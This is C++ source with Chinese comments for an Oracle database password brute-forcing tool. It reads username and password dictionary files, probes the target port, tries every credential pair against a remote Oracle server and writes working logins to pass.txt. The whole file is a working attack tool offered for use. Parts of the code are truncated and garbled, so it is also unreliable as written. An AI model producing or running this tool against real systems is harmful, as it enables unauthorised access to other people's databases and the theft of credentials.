/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/ #define WIN32_LEAN_AND_MEAN #if defined(_WIN32) || defined(_WIN64) #include #include #endif #include #include #include #include #include #include #include #include #include #include #pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库 //#pragma comment(lib, "msvcrt.lib") #pragma comment(lib, "msvcprt.lib") //链接到WS2_32.LIB库: #pragma comment(lib, "Ws2_32.lib") //#pragma comment(lib, "liboracle.lib") char target[40]= {0};//目标服务器 char port[40]={0};//SQL端口号 char db[40]={0};//数据库名 //定义链表: typedef struct PassNode{ TCHAR password[100]; struct PassNode * Next; } PassInfo; typedef struct NameNode{ TCHAR Name[100]; struct NameNode * Next; }NameInfo; //定义NameInfo来表示NameNode结构 // //函数SQLCheck //功能:尝试用不同密码连接SQL Server,探测出正确的密码 // DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName) { //定义局部变量 char szBuffer[1025]= {0}; char *pwd=NULL,*UserName=NULL; char DataBase[255]={0}; //char *user=NULL; //取得传递过来准备探测的密码 pwd=(char *)pPwd; UserName=(char *)uUserName; //DataBase=(char *)db; sprintf(DataBase,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(SERVICE_NAME=%s)))",target,port,db); //printf("DataBase=%s\n",DataBase); using namespace std; using namespace oracle::occi; Environment * env=Environment::createEnvironment(Environment::DEFAULT); try{ Connection *conn=env->createConnection(UserName,pwd,(char *)DataBase); if (conn) { printf("\n"); cout << "SUCCESS - createConnection" << endl; //连接远程oracle Server数据库成功 return 1; } else cout << "FAILURE - createConnection" << endl; return 0; /*Statement*stmt=conn->createStatement("select * from emp"); ResultSet * rset=stmt->executeQuery(); while (rset->next()) { cout<<"the empno is:"<getInt(1)<getString(2)<closeResultSet (rset); // conn->terminateStatement (stmt); env->terminateConnection (conn); }catch(SQLException ex) { //printf("\n"); cout<Next = NULL; p = h; for ( i=0; i < NodeNum; i ++) //下面是建立链表,每个密码对应一个结点: { //按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR)); ZeroMemory(szTempPass, 100); if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL) { fprintf(stderr, "malloc failed %d", GetLastError()); exit(0); } memset(s->password, '\0', 100); fgets(szTempPass, 100, DictFile); strncpy(s->password, szTempPass, strlen(szTempPass)-1); s->Next =NULL; //删除一个结点 p->Next = s;//链表指针指向下一个结构地址 p = s;//下一个结构的数据域赋值 free(szTempPass);//释放内存空间 } return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据 } //创建用户名链表: NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){ /* read data from password dictionary, init the link */ TCHAR * szTempName = NULL; NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node, *s point to the current node*/ int i; /* counter*/ //分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为NameInfo结构的首地址)的首地址: : if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL ) { fprintf(stdout, "malloc failed %d", GetLastError()); exit(0); } /* create the head node */ /* init the head node*/ h->Next = NULL; //删除下一个结点 p = h; //p里面目前指向头结点 for ( i=0; i < NodeNum; i ++) {//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass: szTempName = (TCHAR *)calloc(100, sizeof(TCHAR)); ZeroMemory(szTempName, 100);//字符串类型变量清0 if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL) { fprintf(stdout, "malloc failed %d", GetLastError()); exit(0); } memset(s->Name, '\0', 100); fgets(szTempName, 100, DictFile); strncpy(s->Name, szTempName, strlen(szTempName)-1); s->Next =NULL; p->Next = s;//p指向下一个结点的地址 p = s;//下一个结构的数据域赋值 free(szTempName); } return h; } int LineCount(FILE * fd) //返回字典中的密码数量 { int countline = 0; char data[100] = {0};//字符数组清0 while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中 countline++; rewind(fd);//指针返回到文件起始处 return countline; } BOOL IsPortOpen(char * address, int port) { int recv = 1; WSADATA wsadata; int fd; struct sockaddr_in clientaddress; struct hostent * host1; BOOL Result = FALSE; struct timeval timer4; fd_set writefd; //检查数据是否可写 ULONG value = 1; //初使化winsock版本1.1: recv = WSAStartup(MAKEWORD(1,1), &wsadata); if(recv != 0) { printf("init failed %d.\n",WSAGetLastError()); return(0); } if ( LOBYTE( wsadata.wVersion ) != 1 || HIBYTE( wsadata.wVersion ) != 1 ) { /* Tell the user that we couldn't find a useable */ /* winsock.dll. */ WSACleanup(); return(0); } //创建socket套接字连接: fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(fd < 0) { printf("[-] Create socket error %d. \n",WSAGetLastError()); return(0); } //将套接字fd设为非阻塞模式的方法: ioctlsocket(fd,FIONBIO,&value); if (!(host1 = gethostbyname(address))){ printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError()); return(0); } memset(&clientaddress, 0, sizeof(struct sockaddr)); clientaddress.sin_family =AF_INET;//Ipv4地址族 clientaddress.sin_port = htons((unsigned short)port); clientaddress.sin_addr = *((struct in_addr *)host1->h_addr); timer4.tv_sec = 5;//以秒为单位指定等待时间 timer4.tv_usec = 0; FD_ZERO(&writefd); FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试 recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr)); if( FD_ISSET(fd, &writefd)) { recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入 if( recv > 0 ) Result = TRUE; } closesocket(fd); WSACleanup(); return Result; } int main(int argc, char **argv) { PassInfo * head, * curr = NULL; NameInfo * headnode, * currnode = NULL; int namecount = 0, passcount = 0; ///////////////////////////////////////////////////////////////////////////////////////////// // deal with the command line // ///////////////////////////////////////////////////////////////////////////////////////////// //参数不为8个的时候打印帮助 if(argc != 10) usage(); if (argc == 10) { if ( strcmpi(argv[2], "-x") ) usage(); if ( strcmpi(argv[4], "-u") ) usage(); if ( strcmpi(argv[6], "-d") ) usage(); if ( strcmpi(argv[8], "-i") ) usage(); } /* determinate whether the oracle port is open */ if( !IsPortOpen(argv[1], atoi(argv[3]) ) ) { printf("error:Can't connect to %s:%d\n", argv[1], atoi(argv[3])); exit(0); } //////////////////////////////////////////////////////////////////////////////////////////// // specifiy the username ////////////////////////////////////////////////////////////////////////////////////////////// //取得目标地址和端口号: strcpy(target,argv[1]); strcpy(port,argv[3]); strcpy(db,argv[9]); if ( !strcmpi(argv[4], "-u")) { /* open the password dictionary */ FILE * passdic = NULL; if ( (passdic = fopen(argv[7], "r")) ==NULL){ fprintf(stdout, "Can't open the password dictionary\n"); exit(0); } /* count line of name dictionary */ passcount = LineCount(passdic); //计算密码的数量 head = Create_Pass_link(passcount, passdic); /* create the password link */ curr = head ->Next; //指向第一个结点 /* open the password dictionary */ FILE * Namedict = NULL; if ( (Namedict = fopen(argv[5], "r")) ==NULL){ fprintf(stderr, "Can't open the name dictionary\n"); exit(0); } /*密码最终保存文件*/ FILE *passtxt=NULL; if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){ fprintf(stdout, "Can't write pass.txt file!\n"); exit(0); } /* count line of name dictionary */ namecount = LineCount(Namedict);//计算用户名数量 headnode = Create_Name_link(namecount, Namedict); /* create user link */ currnode = headnode->Next; int j=0,i=1; while(currnode!=NULL) //为NULL表示姓名链表结束 { printf("\n开始第%d位用户%s测试:\n",++j,currnode->Name); while(curr != NULL) //为NULL表示密码链表结束 { printf("Now cracking %s->%s \n", currnode->Name, curr->password); fflush(NULL); int Cracked=0; Cracked=SQLCheck(curr->password,currnode->Name); if ( Cracked==1 ) { printf("%d.Successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->Name, curr->password); fseek(passtxt, 0L, SEEK_END);//移动到文件尾部 fprintf(passtxt,"%d.Successfully:oracle server %s's username [%s] password [%s]\r\n",i++,target,currnode->Name, curr->password); //exit(0);发现一个密码就退出 break; } curr = curr->Next;//移动到下一个结点 Sleep(100);//暂停100ms,即0.1s } /* starting crack the oracle password*/ currnode = currnode->Next; curr = head ->Next; //移到密码链表的第一个结点 } printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount); printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n"); fprintf(passtxt,"\r\n\r\n"); fclose(passdic); fclose(Namedict); fclose(passtxt); free(head); } return 0;